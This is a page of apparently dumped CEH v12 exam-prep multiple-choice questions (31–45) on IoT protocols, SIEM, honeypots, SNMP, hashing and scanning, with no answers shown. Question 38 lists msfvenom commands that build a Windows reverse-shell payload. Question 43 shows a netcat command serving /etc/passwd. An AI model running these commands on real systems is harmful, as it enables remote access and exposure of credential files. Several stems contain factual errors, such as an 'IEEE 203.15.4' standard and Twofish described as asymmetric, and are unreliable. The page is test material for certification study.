Pass the ECCouncil CEH v12 312-50v12 Questions and answers with CertsForce

Viewing page 3 out of 12 pages
Viewing questions 31-45 out of questions
Questions # 31:

George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial systems. In this process, he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?

Options:

A.

MQTT


B.

LPWAN


C.

Zigbee


D.

NB-IoT


Expert Solution
Questions # 32:

Within the context of Computer Security, which of the following statements describes Social Engineering best?

Options:

A.

Social Engineering is the act of publicly disclosing information


B.

Social Engineering is the means put in place by human resource to perform time accounting


C.

Social Engineering is the act of getting needed information from a person rather than breaking into a system


D.

Social Engineering is a training program within sociology studies


Expert Solution
Questions # 33:

The tools which receive event logs from servers, network equipment, and applications, and perform analysis and correlation on those logs, and can generate alarms for security relevant issues, are known as what?

Options:

A.

network Sniffer


B.

Vulnerability Scanner


C.

Intrusion prevention Server


D.

Security incident and event Monitoring


Expert Solution
Questions # 34:

joe works as an it administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider, in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?

Options:

A.

Cloud booker


B.

Cloud consumer


C.

Cloud carrier


D.

Cloud auditor


Expert Solution
Questions # 35:

which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?

Options:

A.

intrusion detection system


B.

Honeypot


C.

Botnet

D Firewall


Expert Solution
Questions # 36:

Garry is a network administrator in an organization. He uses SNMP to manage networked devices from a remote location. To manage nodes in the network, he uses MIB. which contains formal descriptions of all network objects managed by SNMP. He accesses the contents of MIB by using a web browser either by entering the IP address and Lseries.mlb or by entering the DNS library name and Lseries.mlb. He is currently retrieving information from an MIB that contains object types for workstations and server services. Which of the following types of MIB is accessed by Garry in the above scenario?

Options:

A.

LNMIB2.MIB


B.

WINS.MIB


C.

DHCP.MIS


D.

MIB_II.MIB


Expert Solution
Questions # 37:

What is the main security service a cryptographic hash provides?

Options:

A.

Integrity and ease of computation


B.

Message authentication and collision resistance


C.

Integrity and collision resistance


D.

Integrity and computational in-feasibility


Expert Solution
Questions # 38:

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

Options:

A.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c


B.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c


C.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe


D.

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe


Expert Solution
Questions # 39:

This form of encryption algorithm is asymmetric key block cipher that is characterized by a 128-bit block size, and its key size can be up to 256 bits. Which among the following is this encryption algorithm?

Options:

A.

Twofish encryption algorithm


B.

HMAC encryption algorithm


C.

IDEA


D.

Blowfish encryption algorithm


Expert Solution
Questions # 40:

What hacking attack is challenge/response authentication used to prevent?

Options:

A.

Replay attacks


B.

Scanning attacks


C.

Session hijacking attacks


D.

Password cracking attacks


Expert Solution
Questions # 41:

Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

Options:

A.

nmap -sn -pp < target ip address >


B.

nmap -sn -PO < target IP address >


C.

nmap -sn -PS < target IP address >


D.

nmap -sn -PA < target IP address >


Expert Solution
Questions # 42:

These hackers have limited or no training and know how to use only basic techniques or tools.

What kind of hackers are we talking about?

Options:

A.

Black-Hat Hackers A


B.

Script Kiddies


C.

White-Hat Hackers


D.

Gray-Hat Hacker


Expert Solution
Questions # 43:

What does the following command in netcat do?

nc -l -u -p55555 < /etc/passwd

Options:

A.

logs the incoming connections to /etc/passwd file


B.

loads the /etc/passwd file to the UDP port 55555


C.

grabs the /etc/passwd file when connected to UDP port 55555


D.

deletes the /etc/passwd file when connected to the UDP port 55555


Expert Solution
Questions # 44:

Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?

Options:

A.

WebSite Watcher


B.

web-Stat


C.

Webroot


D.

WAFW00F


Expert Solution
Questions # 45:

During the enumeration phase. Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445.

Which of the following services is enumerated by Lawrence in this scenario?

Options:

A.

Server Message Block (SMB)


B.

Network File System (NFS)


C.

Remote procedure call (RPC)


D.

Telnet


Expert Solution
Viewing page 3 out of 12 pages
Viewing questions 31-45 out of questions